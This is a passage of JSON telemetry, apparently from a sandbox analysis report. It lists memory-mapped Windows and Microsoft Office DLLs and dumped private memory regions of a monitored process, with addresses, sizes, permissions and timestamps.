"\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL", "id": "region_253", "name": "mso40uires.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uires.dll", "region_type": "memory_mapped_file", "start_va": 8791437017088, "timestamp": "00:00:09.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 19775488, "start_va": 8791440228352, "type": "region", "version": 1 }, "end_va": 8791460003839, "entry_point": 8791440228352, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\MSO.DLL", "id": "region_254", "name": "mso.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso.dll", "region_type": "memory_mapped_file", "start_va": 8791440228352, "timestamp": "00:00:09.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8175616, "start_va": 8791460020224, "type": "region", "version": 1 }, "end_va": 8791468195839, "entry_point": 8791460020224, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll", "id": "region_255", "name": "mso99lwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso99lwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791460020224, "timestamp": "00:00:09.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 9351168, "start_va": 8791468212224, "type": "region", "version": 1 }, "end_va": 8791477563391, "entry_point": 8791468212224, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll", "id": "region_256", "name": "mso40uiwin32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso40uiwin32client.dll", "region_type": "memory_mapped_file", "start_va": 8791468212224, "timestamp": "00:00:09.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4685824, "start_va": 8791477583872, "type": "region", "version": 1 }, "end_va": 8791482269695, "entry_point": 8791477583872, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll", "id": "region_257", "name": "mso30win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso30win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791477583872, "timestamp": "00:00:09.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3162112, "start_va": 8791482302464, "type": "region", "version": 1 }, "end_va": 8791485464575, "entry_point": 8791482302464, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll", "id": "region_258", "name": "mso20win32client.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\mso20win32client.dll", "region_type": "memory_mapped_file", "start_va": 8791482302464, "timestamp": "00:00:09.921", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 18268160, "start_va": 8791485513728, "type": "region", "version": 1 }, "end_va": 8791503781887, "entry_point": 8791485513728, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\OART.DLL", "id": "region_259", "name": "oart.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\oart.dll", "region_type": "memory_mapped_file", "start_va": 8791485513728, "timestamp": "00:00:09.923", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 811008, "start_va": 8791504257024, "type": "region", "version": 1 }, "end_va": 8791505068031, "entry_point": 8791504257024, "filename": "\\Windows\\System32\\d3d11.dll", "id": "region_260", "name": "d3d11.dll", "norm_filename": "c:\\windows\\system32\\d3d11.dll", "region_type": "memory_mapped_file", "start_va": 8791504257024, "timestamp": "00:00:09.925", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 37351424, "start_va": 8791505108992, "type": "region", "version": 1 }, "end_va": 8791542460415, "entry_point": 8791505108992, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\WWLIB.DLL", "id": "region_261", "name": "wwlib.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\wwlib.dll", "region_type": "memory_mapped_file", "start_va": 8791505108992, "timestamp": "00:00:09.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791547314176, "type": "region", "version": 1 }, "end_va": 8791547768831, "entry_point": 8791547314176, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_262", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791547314176, "timestamp": "00:00:09.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791547772928, "type": "region", "version": 1 }, "end_va": 8791547932671, "entry_point": 8791547772928, "filename": "\\Windows\\System32\\sppc.dll", "id": "region_263", "name": "sppc.dll", "norm_filename": "c:\\windows\\system32\\sppc.dll", "region_type": "memory_mapped_file", "start_va": 8791547772928, "timestamp": "00:00:09.940", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 8791548887040, "type": "region", "version": 1 }, "end_va": 8791549128703, "entry_point": 8791548887040, "filename": "\\Windows\\System32\\mlang.dll", "id": "region_264", "name": "mlang.dll", "norm_filename": "c:\\windows\\system32\\mlang.dll", "region_type": "memory_mapped_file", "start_va": 8791548887040, "timestamp": "00:00:09.941", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791587815424, "type": "region", "version": 1 }, "end_va": 8791587864575, "entry_point": 8791587815424, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_265", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791587815424, "timestamp": "00:00:09.942", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791592206336, "type": "region", "version": 1 }, "end_va": 8791592218623, "entry_point": 8791592206336, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l1-2-0.dll", "id": "region_266", "name": "api-ms-win-core-file-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791592206336, "timestamp": "00:00:09.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791592271872, "type": "region", "version": 1 }, "end_va": 8791592284159, "entry_point": 8791592271872, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-processthreads-l1-1-1.dll", "id": "region_267", "name": "api-ms-win-core-processthreads-l1-1-1.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-processthreads-l1-1-1.dll", "region_type": "memory_mapped_file", "start_va": 8791592271872, "timestamp": "00:00:09.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594172416, "type": "region", "version": 1 }, "end_va": 8791594184703, "entry_point": 8791594172416, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_268", "name": "api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594172416, "timestamp": "00:00:09.943", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594237952, "type": "region", "version": 1 }, "end_va": 8791594250239, "entry_point": 8791594237952, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll", "id": "region_269", "name": "api-ms-win-core-localization-l1-2-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594237952, "timestamp": "00:00:09.944", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594303488, "type": "region", "version": 1 }, "end_va": 8791594315775, "entry_point": 8791594303488, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll", "id": "region_270", "name": "api-ms-win-core-file-l2-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594303488, "timestamp": "00:00:09.945", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791594369024, "type": "region", "version": 1 }, "end_va": 8791594381311, "entry_point": 8791594369024, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll", "id": "region_271", "name": "api-ms-win-core-timezone-l1-1-0.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 8791594369024, "timestamp": "00:00:09.945", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 991232, "start_va": 8791594434560, "type": "region", "version": 1 }, "end_va": 8791595425791, "entry_point": 8791594434560, "filename": "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll", "id": "region_272", "name": "ucrtbase.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll", "region_type": "memory_mapped_file", "start_va": 8791594434560, "timestamp": "00:00:09.945", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791595483136, "type": "region", "version": 1 }, "end_va": 8791595511807, "entry_point": 8791595483136, "filename": "\\Windows\\System32\\msimg32.dll", "id": "region_273", "name": "msimg32.dll", "norm_filename": "c:\\windows\\system32\\msimg32.dll", "region_type": "memory_mapped_file", "start_va": 8791595483136, "timestamp": "00:00:09.964", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1216512, "start_va": 8791595548672, "type": "region", "version": 1 }, "end_va": 8791596765183, "entry_point": 8791595548672, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll", "id": "region_274", "name": "c2r64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll", "region_type": "memory_mapped_file", "start_va": 8791595548672, "timestamp": "00:00:09.965", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 8791596793856, "type": "region", "version": 1 }, "end_va": 8791597293567, "entry_point": 8791596793856, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll", "id": "region_275", "name": "appvisvstream64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll", "region_type": "memory_mapped_file", "start_va": 8791596793856, "timestamp": "00:00:09.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2318336, "start_va": 8791597318144, "type": "region", "version": 1 }, "end_va": 8791599636479, "entry_point": 8791597318144, "filename": "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll", "id": "region_276", "name": "appvisvsubsystems64.dll", "norm_filename": "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll", "region_type": "memory_mapped_file", "start_va": 8791597318144, "timestamp": "00:00:09.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2039808, "start_va": 8791607607296, "type": "region", "version": 1 }, "end_va": 8791609647103, "entry_point": 8791607607296, "filename": "\\Windows\\System32\\msxml6.dll", "id": "region_277", "name": "msxml6.dll", "norm_filename": "c:\\windows\\system32\\msxml6.dll", "region_type": "memory_mapped_file", "start_va": 8791607607296, "timestamp": "00:00:09.969", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791610294272, "type": "region", "version": 1 }, "end_va": 8791610757119, "entry_point": 8791610294272, "filename": "\\Windows\\System32\\winspool.drv", "id": "region_278", "name": "winspool.drv", "norm_filename": "c:\\windows\\system32\\winspool.drv", "region_type": "memory_mapped_file", "start_va": 8791610294272, "timestamp": "00:00:09.991", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791616061440, "type": "region", "version": 1 }, "end_va": 8791616122879, "entry_point": 8791616061440, "filename": "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll", "id": "region_279", "name": "msointl30.dll", "norm_filename": "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll", "region_type": "memory_mapped_file", "start_va": 8791616061440, "timestamp": "00:00:09.993", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791621107712, "type": "region", "version": 1 }, "end_va": 8791621189631, "entry_point": 8791621107712, "filename": "\\Windows\\System32\\wbem\\wbemsvc.dll", "id": "region_280", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 8791621107712, "timestamp": "00:00:09.994", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791624253440, "type": "region", "version": 1 }, "end_va": 8791624314879, "entry_point": 8791624253440, "filename": "\\Windows\\System32\\wbem\\wbemprox.dll", "id": "region_281", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\system32\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 8791624253440, "timestamp": "00:00:09.997", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 8791624318976, "type": "region", "version": 1 }, "end_va": 8791624478719, "entry_point": 8791624318976, "filename": "\\Windows\\System32\\ntdsapi.dll", "id": "region_282", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\system32\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 8791624318976, "timestamp": "00:00:09.998", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000426-addr_0x0000000000310000-size_0x000000000000f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_122", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 61440, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3272703, "entry_point": 0, "filename": null, "id": "region_426", "name": "private_0x0000000000310000", "norm_filename": null, "region_type": "private_memory", "start_va": 3211264, "timestamp": "00:00:15.811", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000430-addr_0x00000000040f0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_123", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 68091904, "type": "region", "version": 1 }, "end_va": 68218879, "entry_point": 0, "filename": null, "id": "region_430", "name": "private_0x00000000040f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 68091904, "timestamp": "00:00:15.812", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000431-addr_0x0000000004110000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_124", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 68222976, "type": "region", "version": 1 }, "end_va": 68349951, "entry_point": 0, "filename": null, "id": "region_431", "name": "private_0x0000000004110000", "norm_filename": null, "region_type": "private_memory", "start_va": 68222976, "timestamp": "00:00:15.813", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000432-addr_0x00000000042b0000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_125", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 69926912, "type": "region", "version": 1 }, "end_va": 70049791, "entry_point": 0, "filename": null, "id": "region_432", "name": "private_0x00000000042b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 69926912, "timestamp": "00:00:15.813", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000433-addr_0x0000000004310000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_126", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 70320128, "type": "region", "version": 1 }, "end_va": 70447103, "entry_point": 0, "filename": null, "id": "region_433", "name": "private_0x0000000004310000", "norm_filename": null, "region_type": "private_memory", "start_va": 70320128, "timestamp": "00:00:15.813", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000434-addr_0x0000000004350000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_127", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 70582272, "type": "region", "version": 1 }, "end_va": 70709247, "entry_point": 0, "filename": null, "id": "region_434", "name": "private_0x0000000004350000", "norm_filename": null, "region_type": "private_memory", "start_va": 70582272, "timestamp": "00:00:15.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000435-addr_0x00000000044e0000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_128", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 72220672, "type": "region", "version": 1 }, "end_va": 72347647, "entry_point": 0, "filename": null, "id": "region_435", "name": "private_0x00000000044e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 72220672, "timestamp": "00:00:15.814", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000436-addr_0x0000000004500000-size_0x000000000001e000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_129", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 122880, "start_va": 72351744, "type": "region", "version": 1 }, "end_va": 72474623, "entry_point": 0, "filename": null, "id": "region_436", "name": "private_0x0000000004500000", "norm_filename": null, "region_type": "private_memory", "start_va": 72351744, "timestamp": "00:00:15.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000437-addr_0x0000000004da0000-size_0x0000000000021000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_130", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 135168, "start_va": 81395712, "type": "region", "version": 1 }, "end_va": 81530879, "entry_point": 0, "filename": null, "id": "region_437", "name": "private_0x0000000004da0000", "norm_filename": null, "region_type": "private_memory", "start_va": 81395712, "timestamp": "00:00:15.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000438-addr_0x0000000004e60000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_131", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 82182144, "type": "region", "version": 1 }, "end_va": 82309119, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x0000000004e60000", "norm_filename": null, "region_type": "private_memory", "start_va": 82182144, "timestamp": "00:00:15.815", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000441-addr_0x0000000005050000-size_0x000000000001f000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_132", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 126976, "start_va": 84213760, "type": "region", "version": 1 }, "end_va": 84340735, "entry_point": 0, "filename": null, "id": "region_441", "name": "private_0x0000000005050000", "norm_filename": null, "region_type": "private_memory", "start_va": 84213760, "timestamp": "00:00:15.816", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000459-addr_0x000000000a700000-size_0x00000000004b2000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_133", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4923392, "start_va": 175112192, "type": "region", "version": 1 }, "end_va": 180035583, "entry_point": 0, "filename": null, "id": "region_459", "name": "private_0x000000000a700000", "norm_filename": null, "region_type": "private_memory", "start_va": 175112192, "timestamp": "00:00:16.299", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000479-addr_0x0000000004e80000-size_0x0000000000008000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_134", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 32768, "start_va": 82313216, "type": "region", "version": 1 }, "end_va": 82345983, "entry_point": 0, "filename": null, "id": "region_479", "name": "private_0x0000000004e80000", "norm_filename": null, "region_type": "private_memory", "start_va": 82313216, "timestamp": "00:00:16.937", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000480-addr_0x0000000005360000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_135", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 87425024, "type": "region", "version": 1 }, "end_va": 87687167, "entry_point": 0, "filename": null, "id": "region_480", "name": "private_0x0000000005360000", "norm_filename": null, "region_type": "private_memory", "start_va": 87425024, "timestamp": "00:00:16.938", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000481-addr_0x0000000005030000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_136", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 84082688, "type": "region", "version": 1 }, "end_va": 84094975, "entry_point": 0, "filename": null, "id": "region_481", "name": "private_0x0000000005030000", "norm_filename": null, "region_type": "private_memory", "start_va": 84082688, "timestamp": "00:00:16.939", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000491-addr_0x0000000006960000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_137", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 110493696, "type": "region", "version": 1 }, "end_va": 110510079, "entry_point": 0, "filename": null, "id": "region_491", "name": "private_0x0000000006960000", "norm_filename": null, "region_type": "private_memory", "start_va": 110493696, "timestamp": "00:00:17.107", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000494-addr_0x00000000069f0000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_138", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 111083520, "type": "region", "version": 1 }, "end_va": 111099903, "entry_point": 0, "filename": null, "id": "region_494", "name": "private_0x00000000069f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 111083520, "timestamp": "00:00:17.111", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000495-addr_0x0000000006a00000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_139", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 111149056, "type": "region", "version": 1 }, "end_va": 111165439, "entry_point": 0, "filename": null, "id": "region_495", "name": "private_0x0000000006a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 111149056, "timestamp": "00:00:17.112", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000496-addr_0x0000000006b90000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_140", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 112787456, "type": "region", "version": 1 }, "end_va": 112803839, "entry_point": 0, "filename": null, "id": "region_496", "name": "private_0x0000000006b90000", "norm_filename": null, "region_type": "private_memory", "start_va": 112787456, "timestamp": "00:00:17.114", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000497-addr_0x0000000006ba0000-size_0x0000000000004000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_141", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 16384, "start_va": 112852992, "type": "region", "version": 1 }, "end_va": 112869375, "entry_point": 0, "filename": null, "id": "region_497", "name": "private_0x0000000006ba0000", "norm_filename": null, "region_type": "private_memory", "start_va": 112852992, "timestamp": "00:00:17.120", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000001-region_00000508-addr_0x000000000cec0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", 